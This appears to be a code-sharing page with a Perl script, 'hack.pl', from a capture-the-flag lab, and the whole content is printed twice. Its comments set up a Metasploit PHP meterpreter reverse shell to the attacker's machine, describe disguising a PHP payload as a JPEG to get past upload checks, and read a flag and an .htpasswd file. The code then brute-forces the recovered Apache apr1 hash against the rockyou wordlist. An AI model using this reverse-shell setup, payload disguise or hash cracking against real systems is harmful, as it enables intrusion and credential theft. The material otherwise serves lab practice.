rdapaz · September 13, 2018 09:45
diff --git a/hack.pl b/hack.pl
 #!/usr/bin/perl
 #developer:$apr1$Wv63/0xM$6hoeCDM.YzSITNZYFf6Bd/
 #
 # kali ip = 10.10.1.190
 # exploit vm ip = 10.10.1.59
 # msfconsole -x "use exploit/multi/handler; set PAYLOAD php/meterpreter/reverse_tcp; set LHOST 10.10.1.190; set LPORT 6000; exploit"
 # use msfvenom to generate php payload, copy it to windows and use Winhex to insert binary code at the commencement of the file so that it resembles a jpeg 
 # xxd exploit.php | head -n 1
 # 00000000: ffd8 ffde 0a2f 2a3c 3f70 6870 202f 2a2a  ...../*<?php /**

 # cd ../private
 # pwd => /var/www/html/private
 # cat secret.txt => flag 2
 # cat .htpasswd


 #100400/r--------  108   fil   2018-08-11 13:34:58 +0800  .htaccess
 #100400/r--------  49    fil   2018-08-11 13:35:01 +0800  .htpasswd
 #100400/r--------  0     fil   2018-08-11 13:34:52 +0800  index.html
 #100400/r--------  73    fil   2018-08-11 13:34:52 +0800  secret.txt


 use v5.10;

 my $match = '$apr1$Wv63/0xM$6hoeCDM.YzSITNZYFf6Bd/';

 open(FILE, '<', '/root/Desktop/rockyou.txt') or die $!;
 my $count = 0;
 while(<FILE>){
 	chomp;
 	my $str = `openssl passwd -apr1 $_`;
 	$count++;
 	print $count . '::' . $_ . '::' . $str;
 	if ($str eq $match){
 		print "$str is the password!\n";
 		break;
 	}
 }


 #!/usr/bin/perl

 use v5.10;

 my $clear = "password123";

 for (my $i=0; $i<10; $i++)
 {
 	my $str;
 	$str = `openssl passwd -apr1 $clear` or die $!;
 	print $str;
 }



 $apr1$.mCyx5Ct$.aABlBNJrgTAbkqZ1DHzV1
 $apr1$Ra4kFt2k$ySEOsjOdvMuHJ8x1G8gh30
 $apr1$UFviX9ph$CM7xkfi.eDT/feXwd7KSk.
 $apr1$/XeHH8Xm$0oO/FvFkOlc3PMM7jteN41
 $apr1$XgcBtQNe$ssiEM.p0tUaS0GAwI9uEi.
 $apr1$6yfckfe9$2sIIJL/CB3uP9eYs5vp8u0
 $apr1$vFvro1jk$OilLbryMNPanEyxkmy4150
 $apr1$XlaoG12j$W04snMAmfYmdTn2b/EmzI0
 $apr1$3g7P93Rm$IPQtpgv44gmIL/o./sgWj0
 $apr1$ZDrtXutx$agcugaEMxtBaiERzZq0ZE1
	#!/usr/bin/perl
	#developer:$apr1$Wv63/0xM$6hoeCDM.YzSITNZYFf6Bd/
	#
	# kali ip = 10.10.1.190
	# exploit vm ip = 10.10.1.59
	# msfconsole -x "use exploit/multi/handler; set PAYLOAD php/meterpreter/reverse_tcp; set LHOST 10.10.1.190; set LPORT 6000; exploit"
	# use msfvenom to generate php payload, copy it to windows and use Winhex to insert binary code at the commencement of the file so that it resembles a jpeg
	# xxd exploit.php \| head -n 1
	# 00000000: ffd8 ffde 0a2f 2a3c 3f70 6870 202f 2a2a ...../<?php /*

	# cd ../private
	# pwd => /var/www/html/private
	# cat secret.txt => flag 2
	# cat .htpasswd


	#100400/r-------- 108 fil 2018-08-11 13:34:58 +0800 .htaccess
	#100400/r-------- 49 fil 2018-08-11 13:35:01 +0800 .htpasswd
	#100400/r-------- 0 fil 2018-08-11 13:34:52 +0800 index.html
	#100400/r-------- 73 fil 2018-08-11 13:34:52 +0800 secret.txt


	use v5.10;

	my $match = '$apr1$Wv63/0xM$6hoeCDM.YzSITNZYFf6Bd/';

	open(FILE, '<', '/root/Desktop/rockyou.txt') or die $!;
	my $count = 0;
	while(<FILE>){
	chomp;
	my $str = `openssl passwd -apr1 $_`;
	$count++;
	print $count . '::' . $_ . '::' . $str;
	if ($str eq $match){
	print "$str is the password!\n";
	break;
	}
	}


	#!/usr/bin/perl

	use v5.10;

	my $clear = "password123";

	for (my $i=0; $i<10; $i++)
	{
	my $str;
	$str = `openssl passwd -apr1 $clear` or die $!;
	print $str;
	}



	$apr1$.mCyx5Ct$.aABlBNJrgTAbkqZ1DHzV1
	$apr1$Ra4kFt2k$ySEOsjOdvMuHJ8x1G8gh30
	$apr1$UFviX9ph$CM7xkfi.eDT/feXwd7KSk.
	$apr1$/XeHH8Xm$0oO/FvFkOlc3PMM7jteN41
	$apr1$XgcBtQNe$ssiEM.p0tUaS0GAwI9uEi.
	$apr1$6yfckfe9$2sIIJL/CB3uP9eYs5vp8u0
	$apr1$vFvro1jk$OilLbryMNPanEyxkmy4150
	$apr1$XlaoG12j$W04snMAmfYmdTn2b/EmzI0
	$apr1$3g7P93Rm$IPQtpgv44gmIL/o./sgWj0
	$apr1$ZDrtXutx$agcugaEMxtBaiERzZq0ZE1